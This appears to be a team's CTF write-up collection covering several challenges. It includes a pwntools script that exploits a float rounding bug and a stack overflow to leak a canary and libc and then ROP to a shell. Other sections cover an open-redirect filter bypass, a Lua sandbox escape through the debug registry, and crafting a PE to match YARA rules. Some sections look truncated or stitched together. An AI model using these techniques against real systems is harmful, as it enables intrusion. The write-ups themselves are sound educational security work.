This was a challenge similar to the one I created for Battle of Hackers 2024 so we solved it relatively fast. The challenge provides us with a binary that presents a menu that allows the user to borrow a loan, repay the loan, mining for money, buy a name and change name.
image
The goal is to get a name. But
To buy a name, you need to have money.
To have money you cannot simply mine, cause it will take a lot of time.
So you need to loan and then repay them.
The vulnerability lies in the way the program keeps track of the user's loan.
Source Code
// Miner struct
struct MinerAccount {
float cash;
float debt_balance;
int mining_attempts;
char name[0x20];
};
// Loan function
void loan(struct MinerAccount *account) {
uint32_t amount = 0;
printf("How much loan would you like to request?\n");
if(scanf("%d", &amount) != 1) {
printf("Invalid input\n");
return;
}
if(account->debt_balance + amount > MAX_LOAN) {
printf("Loan limit exceeded\n");
return;
}
account->cash += amount;
account->debt_balance += amount;
printf("Current cash: $%.2f\n", account->cash);
printf("Debt balance: $%.2f\n", account->debt_balance);
}
The user's loan is defined as a float, which can be subjected to floating point inaccuracy. A float is 32 bit and it has 1 bit for sign, 23 bit for mantissa and 8 bit for exponent. For integers, the inaccuracy starts at 2^24 (16,777,216). In other words, all integers can be represented as floats up to 2^24 but not beyond that. Specifically, in the range of 2^24 to 2^25, float does not support odd numbers, only even numbers.
Proof of Concept
Proof of Concept
Heres a simple C program that demonstrates this
This is the output
Exploiting the Program
Now, we just need to borrow money until 16777216, buy the name, and borrow loan of size $1 until we eventually are able to repay our loan.
Buying the name
After borrowing $1
Buffer Overflow
Source Code
#define MAX_BUF 0x200
struct MinerAccount {
float cash;
float debt_balance;
int mining_attempts;
char name[0x20];
};
void change_name(struct MinerAccount *account) {
if (has_name_rights != 1) {
printf("You do not have the right to change your name.\n");
printf("Please purchase a name to gain the rights to rename your no-name.\n");
return;
}
if(account->debt_balance != 0) {
printf("You still have debts to repay.\n");
printf("Pay off your debts to rename your no-name.\n");
return;
}
printf("Enter new name.\n");
read(0, account->name, MAX_BUF);
printf("Name updated successfully.\n");
}
int main() {
initialize();
srand(time(NULL));
struct MinerAccount account = {0, 0, 0, "no-name"};
while(1) {
int choice;
printf("===========================\n");
printf("Welcome to %s\n", account.name);
printf("Current cash: $%.2f\n", account.cash);
printf("Debt balance: $%.2f\n", account.debt_balance);
printf("===========================\n");
printf("1. Loan\n2. Repayment\n3. Mining\n4. Buy Name\n5. Change Name\n6. Exit\nChoose an action.\n");
scanf("%d", &choice);
switch(choice) {
case 1:
loan(&account);
break;
case 2:
repayment(&account);
break;
case 3:
mining(&account);
break;
case 4:
buy_name(&account);
break;
case 5:
change_name(&account);
break;
case 6:
return 0;
default:
printf("Invalid choice\n");
break;
}
}
return 0;
}
The name in MinerAccount object was assigned to only 0x20 size, but in change_name function we can change up until 0x200. With the help of the printf() in main, we are able to leak the stack canary and libc address after overwriting enough bytes using read(). Putting it all together, we get
We loan 16777216 money
Then we buy name so our money no 16777216 - 1337
Then if we loan 1 dollar each time, our cash increase, but debt stays the same. So we loan 1 dollar for 1337 times
Then can repay all debt
Now start the leaking process through name
Leak canary
Leak libc_start_main address
Proceed will rop chain to system
Exploit Script
from pwn import *
exe = './prob'
elf = context.binary = ELF(exe, checksec = False)
io = elf.process()
context.log_level = 'info'
#---------------------------------------------------------------------
sleep(1)
#io.recvuntil(b'Choose an action.\n')
io.sendline(b'1')
#io.recvuntil(b'How much loan would you like to request?\n')
io.sendline(b'16777216')
#io.recvuntil(b'Choose an action.\n')
io.sendline(b'4')
for i in range(1337):
# io.recvuntil(b'Choose an action.\n')
io.sendline(b'1')
# io.recvuntil(b'How much loan would you like to request?\n')
io.sendline(b'1')
io.recvuntil(b'Choose an action.\n')
io.sendline(b'2')
io.recvuntil(b'How much would you like to repay?\n')
io.sendline(b'16777216')
io.recvuntil(b'Choose an action.')
io.sendline(b'5')
io.recvuntil(b'Enter new name.')
io.sendline(b'A'*44)
io.recvuntil(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n')
canary = io.recv(7).strip()
canary = b'\x00'+canary
canary = unpack(canary)
info(f'Canary: {hex(canary)}')
io.recvuntil(b'Choose an action.')
io.sendline(b'5')
io.recvuntil(b'Enter new name.')
io.sendline(b'A'*59)
io.recvuntil(b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n')
libc_add = unpack(io.recv(6).strip().ljust(8,b'\x00'))
info(f'libc leaked : {hex(libc_add)}')
io.recvuntil(b'Choose an action.')
io.sendline(b'5')
io.recvuntil(b'Enter new name.')
libc = ELF('./libc.so.6')
libc.address = libc_add-0x29d90
rop = ROP(libc)
rop.system(next(libc.search(b'/bin/sh\x00')))
payload = b'A'*44
payload += p64(canary)
payload += b'A'*8
payload += p64(libc.address + 0x0000000000029cd6)
payload += rop.chain()
io.sendline(payload)
#--------------------------------------------------------------------
io.interactive()
@Capang proud of this :D
Rev/CS1338: Script Programming
Given the lua file, we know that it shows the source code of the instance and we are required to connect to the instance and send the correct string in order to get the flag. From the source code, we can see that it loads a file named library.
We tried online decompiler for lua but failed, so ended up using an open source compiler that we learned from https://www.youtube.com/watch?v=nQR1raNkd2s.
Rev/Secure Chat
We are given server.exe, client.exe and OfficeChat.pcapng. The server.exe act as the server for communication, and the client will be acting as the client who start the conversation. This can be seen in the pcap file
The high port number is the client. We can verify this by trying to capture loopback address on our system.
Reversing server.exe
The communication process of the server
Open socket
Accept session
Generate key
Share key with client
Start secure conversation
Reversing client.exe
The communication process of the client
Open socket
Start a session with server
Receive key from server
Start secure communication
Things that we can take note
KEY is generated by the server
KEY will be shared to the client on network
Understanding how the KEY being shared on network
Before the key is sent on the network, it is encrypted using XOR with kek variable.
This mean, from the given pcap file, we can decrypt the KEY being used by XORing the encrypted key with kek
Flag : ACS{D0_NoT_uS3_X0r_f0R_eNcRYp71on_4LG0r1ThM}
Web/Can You REDIRECT Me
We were greeted with a page with almost nothing in it. Except for the provided url parameters: ?url=Report_URL
Let’s take a deeper look into the source code given and perform code analysis/audit.
app.js and utils.js seem like the only relevant files for the challenge. Let’s dissect it real quick.
The framework of the web app is very similar to the several other web challenges, of which are based on Express (NodeJS) and includes Puppeteer methods in its codebase.
There’s nothing really interesting in the utils.js file, except that now we’ve learned the Puppeteer session will be utilizing the goto method, which navigates the headless Chrome browser to the url fed by the user
Route Overview:
The /report route expects a query parameter url. It checks if the URL's hostname is www.google.com. If the condition fails, it responds with I ONLY trust GOOGLE.
Critical Checks:
Hostname Check: url.hostname != "www.google.com". This ensures the hostname is strictly www.google.com.
Protocol Check: url.protocol != "http:" && url.protocol != "https:". Only http: or https: protocols are allowed.
Bot Processing: The bot visits the provided URL. If the final URL's hostname isn't www.google.com, the flag is displayed.
URLs that don't have the URL protocol; http or https that are being passed onto the parameter will result in the output NOPE!
The trick was to pass the hostname validation but somehow make the bot end up on a different hostname. Immediately, I remembered something about Google AMP (Accelerated Mobile Pages). If you hit a URL like this; https://google.com/amp/facebook.com. It passes the hostname check (www.google.com), but when visited, it redirects to facebook.com. Jackpot!
Execution: Hit the /report endpoint with the payload /report?url=https://www.google.com/amp/facebook.com
The server validated the hostname as www.google.com. The bot visited the URL, got redirected by Google AMP to facebook.com. The final check failed because of facebook.com != www.google.com, so the app returned the flag in the JavaScript alert.
Flag: ACS{It_i5_JU$7_tr1Cky_tRiCK}
Misc/Drone Hijacking
We are given a pcap file with RTP streams. Since it is a drone, we suspect that there might be video streaming. There’s a way to convert RTP to H264 manually in Wireshark according to this forum. H.264 is a video compression standard. The goal is to convert to H264 so that we can view the video. In Edit -> Preferences, set the payload type to 96
Then, we will see that RTP stream has been converted to H264. We can install Wireshark plugin to extract H.264 stream from the RTP stream.
Here’s the plugin that I found: https://github.com/volvet/h264extractor/blob/master/rtp_h264_extractor.lua
Just put into the plugin folder where we install our Wireshark and the plugin will appear in Tools section.
We will get .264 file, and we can use ffmpeg to convert it to mp4.
Misc/Lutella
In this challenge, we were tasked with exploiting a Lua-based sandbox environment that had several restrictions, particularly on system calls and sensitive libraries. The goal was to find a way to escape the sandbox and retrieve the flag.
Lua is a lightweight, high-level scripting language commonly embedded in applications to provide extensible scripting capabilities. It is known for its simplicity and flexibility, but in this challenge, we were working with a sandboxed Lua environment, meaning that our access to certain functions and libraries was restricted.
Typically, a sandbox in Lua might restrict access to the following:
System-level functions like os.execute(), os.popen(), and io.popen(). The debug library, which can be used for introspection and manipulation of Lua's internal state. The ability to interact with the file system.
In this environment, we were given limited access to the Lua language but could exploit certain exposed functionalities to break out of the sandbox.
The crux of the exploit involved using Lua's debug library and the internal debug.getregistry() function. The sandbox restricted access to system libraries like os and io, but we were able to bypass these restrictions by directly interacting with Lua's internal registry.
We start by calling the debug.getregistry() function, which returns a global registry table that Lua uses to manage all objects internally. This registry is usually inaccessible in a sandboxed environment, but it wasn’t properly restricted here. By accessing the registry, we were able to locate internal functions and libraries that were not otherwise exposed.
Within the registry, there was an exposed popen function, which allows us to execute system commands. This was a critical vulnerability because it provided a way to interact with the underlying operating system, despite the sandbox restrictions. Normally, Lua’s io.popen or os.popen would be restricted, but by leveraging the registry, we could access and use this function to run shell commands.
Considering typical Lua sandbox escape techniques, I first tried to exploit the debug.getregistry() function. The idea was to look for unsafe methods or libraries available in the registry.
This is the code which imports exactly 62 functions, with 3 of it being from acs.dll. Then, there are large arrays of random data to pass the entropy check.
Version.rc
#include <windows.h>
1 VERSIONINFO
FILEVERSION 1,0,0,0
PRODUCTVERSION 1,0,0,0
FILEFLAGSMASK 0x3F
FILEFLAGS 0x0
FILEOS VOS__WINDOWS32
FILETYPE VFT_APP
FILESUBTYPE 0x0
BEGIN
BLOCK "StringFileInfo"
BEGIN
BLOCK "040904E4" // Language and codepage (US English, Unicode)
BEGIN
VALUE "CompanyName", "acs"
END
END
BLOCK "VarFileInfo"
BEGIN
VALUE "Translation", 0x0409, 1252
END
END
Version.rc is to be compiled with the cpp file to match pe.version_info["CompanyName"] == "acs"
A fake dll to match the number of function imports
The code above will pass most of the rules already, the hardest part was adding a section that matches the standard deviation range of 61.8 - 61.9. After a lot of trial and testing, we made a binary file with random data inside, manually modifying bytes until we achieve the desired standard deviation. We also have to match the condition ($acs = { 90 90 90 90 68 ?? ?? ?? ?? C3 }) where $acs must be located at an offset of +0x2f. We can run these commands to add the section to the exe.
One last step before we match everything, when we compile with the version.res which will make the number of resources into 2. We will use CFF Explorer to just delete the resource
Then, just upload the file.
Flag : ACS{97d9bad8791993f95050bf4668f3e1351f39b21fafeb986822915ecc71d75f77}
Crypto/Secret Encrypt
After analyzing the secret function for a while, we can see that the number of iterations does not change because it uses the same secret3. Since secret1 is also a global variable, it will be updated every time we run this function.
This is the equations that we can derive from the script above. We know that k is the fixed number of iterations that we have to find. We know that k multiplied with output 1 we can get output 2 and same goes for output 3.
Then we will use simultaneous equation to solve for k and remove S4. Then we can factorize both equations. From the first equation there are 2 unknowns so we cannot solve that but the second equation, we have everything we need to solve for k. After getting the value for k, we can solve for S1 and get the p_rsa and we can RSA decrypt for the flag.
Solve Script
from Crypto.Util.number import *
secret_out=[2300421886456816351333038657690265151708360443867130686953248448630531093021776734868674112240095418467093081756335930515843525383128738534202096348377560386173570623441341520395024918493491724749213178102009151013218735777147941242873009226181626903461558777748363070242458097134402254164979416319966395006, 118964893465008760906148513803880740427426131597706706568706005798920125121985562712819885692864935956027782962836691988567169040365350150416055346960755633472875717465898683139277419122088292007600766276511481224635277838009319684482964767210192366303533764466354302709679013042872343430366540326193987064645, 90822909054820019495848981290779830597424633150254073315406974106438388320012099062499510476986746519431915469091680034456400733513195561250293814032158684572016278396810686958474205299987143330650890060883372170577823300904023529858782819407737240576117609136514644966087947730563905446620136904194643698198]
n=20009817089569599969538500034726137113860180378444144520680720380692155921700313466801113645321964859714346152831289324522691712373980295752612143787805513744596845142947565574859214431250136840018060927071875139532338460212335213420284901918516101557291315678272762415979902727124588156079493807073200546288791822792848832017274870268954552045671250363562973791606622534055827461929215079320844719649763363790174187688772315493266741429035524622360771778144037322337653884113230944318554468904277796127275077196154359393948582189156560613101425299832337719592901727785865373121552005054050809254799001160651919041273
enc= 17344290788163015442564038139247334246060642996020446850904852322039560290118766056392172895820951735374997354582709325518744702347901024840385769459937997819017954914367135733032234042160950809727187366403932100980467655542279928058464435224759900315683519706073455878465191841286965255617968372213737731942678587359354085082039577400390336690085883027339539322625462749425424798876860559141668103407199665082352825962061580373066150843935421008052782270096495723400071390700979281961303531001562910399929551753423625553318250211321347445434080128164118499925998330651792925936876711132409460643630484260433317617505
s2 = 2**1024
out21 = (secret_out[2] - secret_out[1])%s2
out10 = (secret_out[1] - secret_out[0])%s2
k = (out21*pow(out10,-1,s2))%s2 # k should be same for all iteration since s3 never changed
out0p = (out10 * pow(k,-1,s2))%s2
s1 = (secret_out[0] - out0p)%s2
p = s1
q = n//p
'''
p = 132790300101366058515958319162299029496405124107273636270906558644633499211040666269535156087138615191931144220498705500614664040267695307905904116245626464026778297953182366717423923687292230514699937937252522698285265470300659804575877503151767844550730621058684052444790791025203953209758824961680910607517
q = 150687339920875382113791022506874143187279559347292591253769866286725301123955523995561688927048985382258572221281989736370068559920886474787642952585643202043783643860132711115711465813075539209137582922811552548124014088150222590245888319427478214922187640615079569173552234835682647189213206202677621977869
'''
assert p*q == n
phi = (p-1)*(q-1)
d = pow(65537,-1,phi)
print(long_to_bytes(pow(enc,d,n)))